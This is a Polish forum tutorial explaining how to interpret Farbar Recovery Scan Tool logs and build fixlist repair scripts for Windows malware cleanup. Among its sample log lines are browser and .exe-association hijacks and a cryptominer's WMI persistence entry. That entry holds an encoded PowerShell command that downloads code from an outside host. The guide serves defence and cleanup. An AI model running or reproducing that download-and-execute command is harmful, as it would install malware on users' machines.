W przypadku naprawy wejść typu Catalog9 zalecaną metodą jest wykorzystanie "netsh winsock reset":

 

cmd: netsh winsock reset

 

Jeśli nadal będzie istniała konieczność naprawy niestandardowych wpisów Catalog9, mogą zostać załączone w skrypcie, a FRST je usunie i przeliczy ponownie wejścia w katalogu.
 

Uszkodzony łańcuch Winsock uniemożliwi maszynie połączenie z Internetem.

 


Brak dostępu do internetu z powodu wybrakowanych wpisów Winsock zostanie zgłoszony w logu następująco:
 

Winsock: -> Catalog5 - Broken internet access due to missing entry. <===== ATTENTION
Winsock: -> Catalog9 - Broken internet access due to missing entry. <==== ATTENTION

 

Winsock: -> Catalog5 - Uszkodzony dostęp do internetu z powodu brakującego wejścia. <==== UWAGA
Winsock: -> Catalog9 - Uszkodzony dostęp do internetu z powodu brakującego wejścia. <==== UWAGA


Aby naprawić tę usterkę, wystarczy dodać do fixlist w/w wpisy.


hosts

W przypadku, gdy w pliku Hosts są niestandardowe wpisy, w logu FRST.txt w sekcji Internet pojawi się linia o treści:

 

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

 

Hosts: W pliku Hosts jest więcej niż jedno wejście. Sprawdź sekcję Hosts w Addition.txt


Jeśli plik hosts nie zostanie wykryty, pojawi się wpis zawiadamiający o niemożności jego wykrycia:

 

Hosts: Hosts file not detected in the default directory

 

Hosts: Nie znaleziono pliku Hosts w domyślnym katalogu


Aby zresetować plik, wystarczy skopiować i wkleić linię do fixlist i hosts zostanie zresetowany. W Fixlog.txt pojawi się linia potwierdzająca reset.


Tcpip i pozostałe wejścia

Wejścia dołączone do fixlist zostaną usunięte.

 

Serwery DNS skonfigurowane w rejestrze (DhcpNameServer i NameServer) mogą zostać porównane ze skanem "DNS servers" w Addition.txt w celu identyfikacji która konfiguracja jest aktywna.

 

 

---------------------------------------------------------------

 

W przypadku modyfikacji StartMenuInternet domyślne wartości będą ukryte na liście filtrowania. Ich widoczność w logu FRST oznacza niedomyślną ścieżkę w rejestrze. Należy zanalizować czy jest ona poprawna, czy też szkodliwie zmodyfikowana. Niepoprawny wpis można dołączyć do fixlist, a domyślna wartość rejestru zostanie przywrócona.

 

Rozszerzenia zainstalowane z innych źródeł niż oficjalne repozytoria (Chrome Web Store, Firefox Add-ons, Microsoft Edge Addons, Opera add-ons) będą mieć wykryty adres aktualizacji (update_url).

 

 

 

Edge:

=======

Na Windows 10 obie wersje przeglądarki są wykrywane i listowane wspólnie w raporcie.
 
Klasyczna wersja Edge: Z wyjątkiem wejścia DownloadDir, linie mogą zostać wprowadzone do fixlist i elementy zostaną skasowane.
 
Wersja oparta na Chromium: Aplikują się te same zasady co w przypadku Google Chrome. Zobacz opis poniżej.
 
 
Firefox:
=======


FRST listuje klucze FF w rejestrze oraz profile na dysku (o ile obecne), niezależnie od tego czy przeglądarka jest zainstalowana. W przypadku układu z wieloma profilami Firefox lub klonów Firefox FRST wykrywa preferencje i rozszerzenia we wszystkich profilach. Niestandardowe profile wprowadzone przez adware są oznaczane.
 
Z wyjątkiem wejść FF DefaultProfile i FF DownloadDir, linie mogą zostać wprowadzone do fixlist i elementy zostaną skasowane.

 
FRST weryfikuje podpisy cyfrowe dodatków. Brak sygnatury zostanie oznaczony etykietą Not signed / Brak podpisu cyfrowego:
 

FF Extension: (Adblocker for Youtube™) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-01-18] [not signed]



Chrome:
=======


FRST listuje klucze Chrome w rejestrze oraz profile na dysku (o ile obecne), niezależnie od tego czy przeglądarka jest zainstalowana. W przypadku układu z wieloma profilami FRST wykrywa preferencje i rozszerzenia we wszystkich profilach. Niestandardowe profile wprowadzone przez adware są oznaczane.
 
Skan preferencji uwzględnia zmodyfikowane wartości stron startowych (HomePage i StartupUrls), włączone przywracanie sesji (Session Restore), niektóre parametry niestandardowego domyślnego dostawcy wyszukiwania oraz dozwolone powiadomienia:

CHR HomePage: Default -> hxxp://www.web-pl.com/
CHR StartupUrls: Default -> "hxxp://www.web-pl.com/"
CHR DefaultSearchURL: Default -> hxxp://www.web-pl.com/search?q={searchTerms}
CHR Session Restore: Default -> is enabled.
CHR Notifications: Default -> hxxps://www.speedtestace.co


Załączenie wejść HomePage, StartupUrls i Notifications w fixlist spowoduje ich usunięcie. Natomiast przetworzenie pozostałych wpisów skutkuje częściowym resetem Chrome i użytkownik zobaczy na stronie ustawień Chrome następujący komunikat: "Chrome detected that some of your settings were corrupted by another program and reset them to their original defaults" / "Przeglądarka Chrome wykryła, że niektóre z jej ustawień zostały zmodyfikowane przez inny program, i przywróciła im pierwotne wartości domyślne".

 

FRST wykrywa również przekierowania nowej karty (NewTab) kontrolowane przez rozszerzenia. W celu usunięcia przekierowań, zidentyfikuj pasujące rozszerzenie (o ile istnieje) i poprawnie je odinstaluj przy udziale opcji Chrome (popatrz poniżej).

 

CHR NewTab: Default ->  Active:"chrome-extension://algadicmefalojnlclaalabdcjnnmclc/stubby.html"
CHR Extension: (RadioRage) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\algadicmefalojnlclaalabdcjnnmclc [2017-04-07]

[Wyszukaj wspólny identyfikator w liniach CHR NewTab i CHR Extension. W przykładzie jest to algadicmefalojnlclaalabdcjnnmclc.]

 

 

Usuwanie rozszerzeń nie jest obsługiwane. Linie CHR Extension są ignorowane w skrypcie naprawy, zamiennie użyj narzędzia własne przeglądarki do pełnej deinstalacji rozszerzenia:

Wpisz chrome://extensions w pasku adresów i wciśnij Enter.
Kliknij Usuń zlokalizowane pod rozszerzeniem, które ma być usunięte.
Pojawi się dialog potwierdzający, wybierz Usuń.

 

Wyjątkiem jest instalator rozszerzenia zlokalizowany w rejestrze (etykiety CHR HKLM i HKU). Załączenie wejścia w fixlist spowoduje usunięcie klucza.

 


Inne przeglądarki oparte na Chromium:
=============================


Obecnie następujące przeglądarki są uwzględnione w skanowaniu i naprawie: Brave, Opera, Vivaldi, Yandex Browser.
 
Aplikują się te same zasady co w przypadku Google Chrome. Zobacz opis powyżej.

 

Przeglądarki nie wskazywane w logu najlepiej w całości odinstalować, po czym uruchomić ponownie komputer i ponownie zainstalować.

 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngSkan główny (FRST.txt)

 
 

Services - Drivers
Usługi - Sterowniki
 
Usługi i sterowniki są sformatowane w następujący sposób:

StatusUruchomienia TypStartu NazwaUsługi; ImagePath lub ServiceDll [Rozmiar DataUtworzenia] (NazwaOsobyPodpisującej -> NazwaProducenta) [weryfikacja podpisu cyfrowego]
 

 

StatusUruchomienia - litera przed liczbą odpowiada aktualnemu stanowi uruchomienia:

R=Running (Uruchomiony)
S=Stopped (Zatrzymany)
U=Undetermined (Nieokreślony)

TypStartu - identyfikowany numerami:

0=Boot
1=System
2=Auto (Automatyczny)
3=Demand (Ręczny)
4=Disabled (Wyłączony)
5=Przypisany przez FRST w przypadku, gdy nie można określić typu startu


 
[X] zlokalizowany na końcu linii oznacza, że FRST nie potrafił odznaleźć powiązanego z daną usługą/sterownikiem pliku i w zamian jest pokazana ścieżka ImagePath lub ServiceDll w całościowej formie widzianej w rejestrze.
 
Domyślne usługi Microsoftu punktujące do plików bez podpisu cyfrowego wymagają naprawy. Przykład:

 

R2 DcomLaunch; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [File not signed]


W tym przypadku plik wymaga podmiany przy udziale poprawnej kopii. Skorzystaj z komendy Replace:, by naprawić plik.

 

W celu usunięcia szkodliwej usługi lub sterownika należy skopiować linię z raportu do pliku fixlist. Powiązany plik powinien zostać dodany osobno. Przykład:

 

R1 94BE3917F6DF; C:\Windows\94BE3917F6DF.sys [619880 2019-03-07] (韵羽健康管理咨询(上海)有限公司 -> VxDriver) <==== ATTENTION [UWAGA]
C:\Windows\94BE3917F6DF.sys


Narzędzie zatrzymuje każdą usługę, której wpis jest umieszczony w fixlist i usuwa klucz usługi.

 

FRST zgłosi (nie)powodzenie zatrzymywania uruchomionych usług. FRST próbuje daną usługę usunąć, niezależnie od tego czy zostanie ona zatrzymana. W sytuacji gdy jest usuwana usługa uruchomiona, FRST poinformuje użytkownika o ukończeniu naprawy i konieczności ponownego uruchomienia. Następnie FRST zrestartuje system. W pliku Fixlog ujrzysz końcową linię korespondującą do wymogu restartu. Jeżeli usługa nie jest uruchomiona, FRST usunie ją bez wymuszania restartu.


 
Jest jeden wyjątek gdy usługa nie zostanie usunięta lecz naprawiona. Dotyczy to szkodliwie zmodyfikowanej usługi Themes (Kompozycje):

 

S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Windows -> Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION [UWAGA]

 

Załączenie wejścia w fixlist spowoduje przywrócenie domyślnej postaci.


Następująca linia nie powinna być załączana w fixlist:

 

"NazwaUsługi" => service was unlocked. <==== ATTENTION

 

"NazwaUsługi" => serwis został odblokowany. <==== UWAGA


Komunikat oznacza, że FRST automatycznie naprawił uszkodzone uprawnienia już podczas skanu. Powinien zostać wygenerowany nowy log FRST, by zweryfikować rezultaty. Jeśli potrzebne, załącz standardową linię usługi w fixlist.
 
 
NetSvcs

Wpisy NetSvc listowane są w osobnych liniach, jak poniżej:

 

NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
NETSVCx32: WpSvc -> no filepath [brak ścieżki do pliku]

 

Załączenie linii NETSVC usuwa jedynie powiązaną wartość z rejestru. Skojarzona usługa (o ile obecna w sekcji Services / Usługi) powinna zostać osobno dodana do usunięcia.

 

 

Przykład:
 
Do usunięcia wartości Netsvc, skojarzonej usługi w rejestrze oraz pliku DLL należałoby wykorzystać następujący skrypt:
 

S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [239016 2016-07-21] (Qihoo 360 Software (Beijing) Company Limited -> ) <==== ATTENTION [UWAGA]
NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
C:\Program Files (x86)\LuDaShi

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngSkan główny (FRST.txt)

 
 
One month (Created/Modified)
Jeden miesiąc (utworzone/zmodyfikowane)

Pierwszy skan raportuje datę i czas utworzenia pliku lub katalogu jako pierwszą pozycję, zaś datę i czas ostatniej modyfikacji na drugim miejscu. Drugi skan pokazuje odwrotną kolejność, tzn. data i czas modyfikacji są na pierwszym miejscu, a data i czas utworzenia na drugim. Rozmiar (w bajtach) pliku również jest pokazany. W przypadku folderu będzie to 00000000, gdyż folder jako taki ma zero bajtów.
 

Skan jest ograniczony do wybranych predefiniowanych lokalizacji, w celu uniknięcia długiego czasu skanowania i bardzo długich logów. Ponadto, FRST tylko wylicza niedomyślne foldery, lecz nie ich zawartość. By sprawdzić zawartość takich folderów, skorzystaj z dyrektywy Folder:.

 

Weryfikacja podpisów cyfrowych jest ograniczona do plików wykonywalnych Microsoftu (domyślnie filtrowane). Inne podpisy cyfrowe nie są weryfikowane. By uzyskać dodatkową listę niepodpisanych cyfrowo plików wykonywalnych, skorzystaj z opcjonalnego skanu SigCheckExt.

 

 

FRST dodaje oznaczenia atrybutów do określonych wejść w raporcie:
 
C - Compressed (Skompresowany)
D - Directory (Katalog)
H - Hidden (Ukryty)
L - Symbolic Link (Link symboliczny)
N - Normal (Zwykły - nie ma ustawionych innych atrybutów)
O - Offline
R - Readonly (Tylko do odczytu)
S - System (Systemowy)
T - Temporary (Tymczasowy)
X - No scrub (Wykluczony ze skanu integralności danych - wsparcie w Windows 8+)

 

 
W celu usunięcia pliku lub folderu z listy z ostatniego miesiąca wystarczy skopiować i wkleić całą linię do fixlist.

Linie punktujące linki symboliczne (atrybut L) są przetwarzane w poprawny sposób. Przykład:

 

2018-02-21 21:04 - 2018-02-21 21:04 - 000000000 ___DL C:\WINDOWS\system32\Link

 
Po załączeniu linii w fixlist FRST skasuje tylko link, pozostawiając docelowy obiekt nienaruszony:

 

Symbolic link found [Link symboliczny znaleziono]: "C:\WINDOWS\system32\Link" => "C:\Windows\System32\Cel"
"C:\WINDOWS\system32\Link" => Symbolic link removed successfully [Link symboliczny pomyślnie usunięto]
C:\WINDOWS\system32\Link => moved successfully [pomyślnie przeniesiono]

 
Alternatywnie można skorzystać z dyrektywy DeleteJunctionsInDirectory:.
 

Inne pliki/foldery można usunąć wpisując korespondującą ścieżkę w fixlist, nie ma potrzeby dodawania cudzysłowów w ścieżce zawierającej spację:
 

C:\Windows\System32\Drivers\szkodnik.sys
C:\Program Files (x86)\Szkodnik


Do zbiorowego usunięcia plików z podobnymi nazwami można wykorzystać symbol wieloznaczny * w skrypcie. Możesz zatem wypisać wszystkie pliki po kolei:
 

C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At52.job


... lub uprościć:

 

C:\Windows\Tasks\At*.job

 

Znak pytajnika "?" jest ignorowany ze względów bezpieczeństwa, niezależnie od tego czy to znak wieloznaczny czy też substytut znaków Unicode (popatrz do opisu "Unicode" w sekcji Wprowadzenie). Znaki wieloznaczne nie są też obsługiwane dla folderów.

 

 


FLock
 
Sekcja wylicza zablokowane pliki i foldery w standardowych katalogach.

 

 

FCheck
 
Sekcja przeznaczona do listowania szkodliwych plików, na przykład DLL Hijacking. Również są wykrywane zerobajtowe pliki EXE i DLL w standardowych folderach. Sekcja jest widoczna w raporcie tylko gdy pasujące elementy są obecne.

Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.


KnownDLLs


Określone elementy z tej sekcji mogą powodować problemy z uruchomieniem systemu jeśli ich brak, są zmodyfikowane lub uszkodzone. W związku z tym ten skan pojawia się tylko, gdy narzędzie zostaje uruchomione w trybie Środowiska odzyskiwania systemu (RE).

Wpisy są filtrowane poza przypadkami gdy wymagają sprawdzenia.

 

Wymagana jest szczególna ostrożność w obchodzeniu się z elementami zidentyfikowanymi w tej sekcji. Widoczność określonego wpisu systemowego oznacza brak lub modyfikację pliku. Wskazana jest pomoc eksperta, aby mieć pewność, że problematyczny plik jest poprawnie zidentyfikowany i zostanie przetworzony w odpowiedni sposób. W większości przypadków w systemie znajduje się poprawny zamiennik, który może zostać znaleziony przy użyciu funkcji Search Files / Szukaj plików. Zajrzyj do sekcji Dyrektyw (by dowiedzieć się jak zamienić plik) oraz Pozostałe skany opcjonalne (by dowiedzieć się jak przeprowadzić wyszukiwanie).

 

 

SigCheck
 
FRST weryfikuje pulę ważnych plików systemowych. Pliki pozbawione poprawnego podpisu cyfrowego lub brakujące pliki zostaną zaraportowane. Sekcja jest filtrowana poza Środowiskiem odzyskiwania systemu (RE), jeśli nie zostały wykryte problemy z plikami.
 
Zmodyfikowane pliki systemowe to ostrzeżenie o prawdopodobnej infekcji malware. Po zidentyfikowaniu infekcji należy zachować ostrożność przy akcji naprawczej oraz skorzystać ze wsparcia eksperta, gdyż usunięcie pliku systemowego może spowodować, że system nie uruchomi się.  Przykład infekcji Hijacker.DNS.Hosts:

 

C:\WINDOWS\system32\dnsapi.dll
[2015-07-10 13:00] - [2015-07-10 13:00] - 0680256 _____ (Microsoft Corporation) 5BB42439197E4B3585EF0C4CC7411E4E

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-07-10 13:00] - [2015-07-10 13:00] - 0534064 _____ (Microsoft Corporation) 4F1AB9478DA2E252F36970BD4E2C643E

 
W tej sytuacji plik musi zostać podmieniony poprawną kopią. Skorzystaj z komendy Replace:.

 

 
Niektóre warianty infekcji SmartService wyłączają dostęp do trybu Recovery. FRST automatycznie odkręca tę modyfikację BCD już podczas skanowania:
 

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully [pomyślnie przywrócono]


Najbezpieczniejszy sposób uruchomienia systemu w Trybie awaryjnym polega na użyciu klawisza F8 (Windows 7 i starsze systemy) lub opcji Uruchamianie zaawansowane (Windows 11, Windows 10 i Windows 8). Niekiedy użytkownicy używają "Narzędzie konfiguracji systemu" (msconfig) aby wystartować w Trybie awaryjnym. W przypadku, gdy Tryb awaryjny jest uszkodzony, komputer jest zablokowany i system nie uruchomi się w trybie normalnym, ponieważ został skonfigurowany do startu w Trybie awaryjnym. W takim przypadku zobaczysz:

 

safeboot: Minimal ==> The system is configured to boot to Safe Mode <==== ATTENTION

 

safeboot: Minimal ==> Ustawiony trwały rozruch w Trybie awaryjnym <==== UWAGA

 

Aby naprawić ten problem, dodaj powyższą linię do fixlist. FRST ustawi normalny tryb jako domyślny i system wyjdzie z pętli.

 

Dotyczy tylko systemu Vista i nowszych systemów Windows.

 

 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.png Skan główny (FRST.txt)

 
 
Association
Powiązania plików
 

Sekcja pojawi się w logu FRST.txt w przypadku, gdy FRST zostanie uruchomiony ze Środowiska odzyskiwania systemu (RE). Jeśli FRST zostanie uruchomiony poza tym środowiskiem, sekcja ta pojawi się w Addition.txt. Skan w Środowisku odzyskiwania systemu (RE) jest ograniczony do rozszerzenia .exe.


Wylicza zmodyfikowane globalne skojarzenie plików .exe, podobne do tego odczytu:
 

HKLM\...\exefile\open\command: C:\Windows\svchost.com "%1" %* <===== ATTENTION [UWAGA]


Tak jak w przypadku innych wpisów rejestru, wystarczy że skopiujesz i wkleisz problematyczne wpisy do pliku fixlist, a zostaną przywrócone do domyślnej postaci. Nie ma potrzeby stosowania dodatkowych napraw rejestru.


Restore Points
Punkty Przywracania systemu
 

Sekcja pojawi się w logu FRST.txt w przypadku, gdy FRST zostanie uruchomiony ze Środowiska odzyskiwania systemu (RE). Jeśli FRST zostanie uruchomiony poza tym środowiskiem, sekcja ta pojawi się w Addition.txt.

 

Tylko w Windows XP mogą zostać przywrócone gałęzie rejestru przy użyciu FRST. Punkty przywracania w Vista oraz nowszych systemach powinny być przywracane z poziomu Środowiska odzyskiwania systemu (RE) przy użyciu stosownych opcji.


Aby naprawić system XP korzystając z jednego z punktów przywracania, dodaj linię tego punktu przywracania w skrypcie fixlist. Przykładowy spis punktów przywracania XP:

 

RP: -> 2010-10-26 19:51 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP83
RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82
RP: -> 2010-10-21 20:02 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP81


Aby przywrócić gałęzie z punktu przywracania 82 (datowanego na 2010-10-24), wystarczy skopiować i wkleić do fixlist linię:
 

RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82



Memory info
Statystyki pamięci

 

Sekcja pojawi się w logu FRST.txt w przypadku, gdy FRST zostanie uruchomiony ze Środowiska odzyskiwania systemu (RE). Jeśli FRST zostanie uruchomiony poza tym środowiskiem, sekcja ta pojawi się w Addition.txt i będzie zawierać więcej informacji (BIOS, Płyta główna, Procesor).

 
Wskazuje ile pamięci RAM (Random Access Memory) jest zainstalowane w komputerze wraz z informacją o ilości dostępnej pamięci fizycznej i procentowo dostępnej pamięci. Czasem pozwala to wyjaśnić zachowanie komputera. Na przykład wykazana liczba może różnić się od tej, którą użytkownik uważa za obecną w systemie. Wskazanie RAM może być niższe, niż to, które jest aktualnie w systemie. Tak się może stać w przypadku, gdy komputer nie ma dostępu do całej pamięci, którą ma zainstalowaną. W skład możliwości wchodzą: uszkodzone kości RAM, problem ze slotami na płycie głównej, lub czynnik nie pozwalający BIOSowi na rozpoznanie jej (np. BIOS może wymagać aktualizacji).
W przypadku systemów 32-bit z większą, niż 4GB ilością pamięci, maksymalną zaraportowaną ilością będzie tylko 4GB. To jest ograniczenie dla 32-bitowych aplikacji.
 
Są również podane informacje o pamięci wirtualnej oraz dostępnej pamięci wirtualnej.
 
 
Drives - MBR & Partition Table
Dyski - MBR & Tablica partycji

 

Sekcje pojawią się w logu FRST.txt w przypadku, gdy FRST zostanie uruchomiony ze Środowiska odzyskiwania systemu (RE). Jeśli FRST zostanie uruchomiony poza tym środowiskiem, sekcje te pojawią się w Addition.txt.


Lista dysków twardych i przenośnych podłączonych do komputera podczas skanu. Niepodmontowane woluminy są identyfikowane przy udziale ścieżek GUID woluminów.

 

Drive c: (OS) (Fixed) (Total:223.02 GB) (Free:173.59 GB) (Model: Force MP500) NTFS
Drive f: (Flash drive) (Removable) (Total:1.91 GB) (Free:1.88 GB) FAT32
Drive g: (Recovery) (Fixed) (Total:0.44 GB) (Free:0.08 GB) (Model: Force MP500) NTFS
Drive x: (Boot) (Fixed) (Total:0.5 GB) (Free:0.49 GB) NTFS

\\?\Volume{74a80af8-ff89-444b-a7a3-09db3d90fd32}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

 
Schemat UEFI/GPT: zostanie wykryty tylko podstawowy układ GPT, kompletna lista partycji jest niedostępna.
 

Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000)

Partition: GPT.

 
Schemat BIOS/MBR: zostanie wykryty kod MBR i wejścia partycji. Aczkolwiek partycje logiczne zlokalizowane na partycjach rozszerzonych nie są wyliczane.
 

Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 73FD73FD)
Partition 1: (Active) - (Size=39.1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=426.7 GB) - (Type=0F Extended)

 
Przy sygnałach, że jest coś nie w porządku z MBR, stosownym krokiem jest jego skontrolowanie. Należy przygotować zrzut MBR do analizy. Uruchom następujący skrypt w dowolnym trybie FRST:

 

SaveMbr: drive=0 (lub inny odpowiedni numer dysku)

 
Po wykonaniu tego polecenia zostanie utworzony plik MBRDUMP.txt w miejscu, z którego został uruchomiony FRST/FRST64.

 

 

O ile zrzut MBR może zostać wykonany zarówno w Trybie normalnym jak i Środowisku odzyskiwania systemu (RE), niektóre infekcje MBR są zdolne zmanipulować zrzut MBR w momencie, gdy Windows jest uruchomiony. Wówczas najlepiej wykonać taki zrzut w Środowisku odzyskiwania systemu (RE).

 

 


LastRegBack
Ostatnia kopia rejestru utworzona przez system

FRST wyszukuje i listuje ostatnią kopię bezpieczeństwa rejestru utworzoną przez system. Kopia ta zawiera wszystkie gałęzie rejestru i znacznie różni się od kopii Ostatnia poprawna konfiguracja (Last Known Good Configuration) adresującej tylko podzespół ControlSet w gałęzi system.

Istnieje wiele powodów, dla których wykorzystanie tej kopii jako rozwiązania dla problemu jest zasadne, lecz najczęstszym jest przypadek, gdy pojawiła się utrata danych lub uszkodzenie systemu. Sytuację zobrazuje następujący wpis w nagłówku FRST:

 

ATTENTION: Could not load system hive.

 

UWAGA: Nie można załadować gałęzi System.

 
Aby to naprawić, dodaj linię w fixlist wg schematu:
 

LastRegBack: >>data<< >>czas<<

 
Przykład:
 

LastRegBack: 2013-07-02 15:09

 

 

Edytowane przez picasso
Odnośnik do komentarza

frstico.pngSkan dodatkowy (Addition.txt)

 

 

 

Nagłówek

Nagłówek skanu dodatkowego zawiera krótkie zestawienie przydatnych informacji. Oto przykładowy nagłówek:
 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2017
Ran by User (21-10-2017 14:16:13)
Running from C:\Users\User\Desktop
Windows 10 Pro Version 1709 16299.19 (X64) (2017-10-17 23:06:22)
Boot Mode: Normal


W polskiej wersji:
 

Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 20-10-2017
Uruchomiony przez NazwaUżytkownika (21-10-2017 14:16:13)
Uruchomiony z C:\Users\NazwaUżytkownika\Desktop
Windows 10 Pro Version 1709 16299.19 (X64) (2017-10-17 23:06:22)
Tryb startu: Normal

.

  • Pierwsza linia mówi czy program został uruchomiony w wariancie 32-bit czy 64-bit. Numer wersji FRST również jest pokazany.
  • Druga linia pokazuje który użytkownik i w jakim czasie uruchomił skan.
  • Trzecia linia to informacja skąd został uruchomiony FRST.
  • Czwarta linia podaje wersję systemu operacyjnego oraz datę jego instalacji.
  • Piąta linia podaje tryb w którym uruchomiono skan.

.

Accounts
Konta użytkowników

Lista standardowych kont użytkowników formatowana wg schematu: Lokalna nazwa konta (Identyfikator SID - Uprawnienia - Status) => Ścieżka profilu. Nazwy kont Microsoftu nie są pokazywane.

 

Szkodliwe wejścia mogą zostać załączone do usunięcia. Przykład:
 

WgaUtilAcc (S-1-5-21-1858304819-142153404-3944803098-1002 - Administrator - Enabled) => removed successfully [pomyślnie usunięto]

 

Tylko konto jako takie zostanie usunięte. Ewentualny powiązany folder w katalogu Users musi być załączony z osobna do usunięcia.




Security Center
Centrum zabezpieczeń

Lista może wykazać pozostałości poprzednio usuwanych programów zabezpieczających. W tej sytuacji linia tego rodzaju może zostać załączona w fixlist w celu jej usunięcia.
Określone programy zabezpieczające uniemożliwiają usunięcie takiego wpisu, jeśli nie są w pełni odinstalowane. W takich przypadkach zamiast potwierdzenia usunięcia w Fixlog zobaczysz:

 

Obiekt Centrum zabezpieczeń => The item is protected. Make sure the software is uninstalled and its services is removed.

 

Obiekt Centrum zabezpieczeń => Element zabezpieczony. Upewnij się, że powiązane oprogramowanie zostało odinstalowane, a jego usługi usunięte.



Installed Programs
Zainstalowane programy

Lista klasycznych desktopowych aplikacji oraz pakietów Windows 11/10/8. Progresywne aplikacje internetowe są odizolowane w sekcji "Chrome apps".

 

Preinstalowane czyste pakiety Microsoftu są filtrowane. Pakiety ze zintegrowanymi reklamami od Microsoftu i innych dostawców oprogramowania są oznaczane przy udziale etykiety [MS Ad]. Przykład:

 

App Radio -> C:\Program Files\WindowsApps\34628NielsCup.AppRadio_9.1.40.6_x64__kz2v1f325crd8 [2019-06-04] (Niels Cup) [MS Ad]

 

Włączone lub wyłączone wejścia widoczne w sekcji Uruchamianie (Startup) są oznaczane etykietą [Startup Task].

 

FRST dysponuje wbudowaną bazą danych używaną do oznaczania desktopowych programów typu adware/PUP. Przykład:

 

Zip Opener Packages (HKU\S-1-5-21-3240431825-2694390405-104744025-1000\...\Zip Opener Packages) (Version: - ) <==== ATTENTION [UWAGA]


Zdecydowanie zaleca się, by oznaczony program w poprawny sposób odinstalować przed użyciem automatycznego programu do usuwania adware. Deinstalator programu adware może usunąć większość swoich wpisów i odwrócić zmiany konfiguracyjne.

Desktopowe programy niewidoczne na liście "Programy i Funkcje" są oznaczane etykietą Hidden:
 

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden


Jest wiele autoryzowanych programów, które są ukryte z dobrych powodów. W przypadku niepożądanych programów, wejścia mogą zostać załączone w fixlist.

 

Ta naprawa tylko czyni dany program widocznym, nie odinstalowuje go. Program powinien zostać odinstalowany przez użytkownika.




Custom CLSID
Niestandardowe rejestracje klas

Wylicza niedomyślne klasy w gałęziach użytkowników, ShellServiceObjectDelayLoad, ShellServiceObjects, ShellExecuteHooks, ShellIconOverlayIdentifiers, ContextMenuHandlers i FolderExtensions.

Przykład:

 

ContextMenuHandlers1: [systemHelper] -> {851aab5c-2010-4157-9c5d-a28dfa7b2660} => C:\Windows\ExplorerPlug.dll [2018-03-03] (Диспетчер источников) [File not signed] [Brak podpisu cyfrowego]


By usunąć szkodliwe wejścia, po prostu załącz je w fixlist, a FRST usunie klucze z rejestru. Powiązane pliki/foldery przeznaczone do usunięcia muszą być załączone z osobna.

 

 

Należy zachować ostrożność, gdyż autoryzowane oprogramowanie firm trzecich może tworzyć niedomyślne wpisy CLSID, które nie powinny być usuwane.

 



Codecs
Kodeki

Załączenie wejść w fixlist spowoduje przywrócenie zmodyfikowanych domyślnych wejść lub usunięcie niestandardowych wejść z rejestru. Powiązane pliki muszą być załączone z osobna.

 

 

Shortcuts & WMI
Skróty & WMI

Spis szkodliwie zmodyfikowanych lub objętych podejrzeniem modyfikacji skrótów w ścieżkach bieżącego zalogowanego użytkownika, wliczając też ścieżki współdzielone między użytkownikami (główny katalog C:\ProgramData\Microsoft\Windows\Start Menu\Programs i C:\Users\Public\Desktop).
Wejścia mogą zostać załączone w fixlist w celu naprawy - zobacz opis Shortcut.txt w sekcji Pozostałe skany opcjonalne.

 

Skan Shortcut.txt zawiera wszystkie skróty wszystkich użytkowników, omawiany tu skan Addition.txt wylicza tylko zmodyfikowane lub podejrzane skróty bieżącego zalogowanego użytkownika.


 

FRST skanuje obszary nazw WMI pod kątem niestandardowych rejestracji. Znane infekcje są oznaczane.

 

Przykład infekcji Cryptocurrency Miner:

 

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"****youmm4\"",Filter="__EventFilter.Name=\"****youmm3\":: <==== ATTENTION [UWAGA]
WMI:subscription\__EventFilter->****youmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION [UWAGA]
WMI:subscription\CommandLineEventConsumer->****youmm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters) (dane wartości zawierają 665 znaków więcej).] <==== ATTENTION [UWAGA]

 

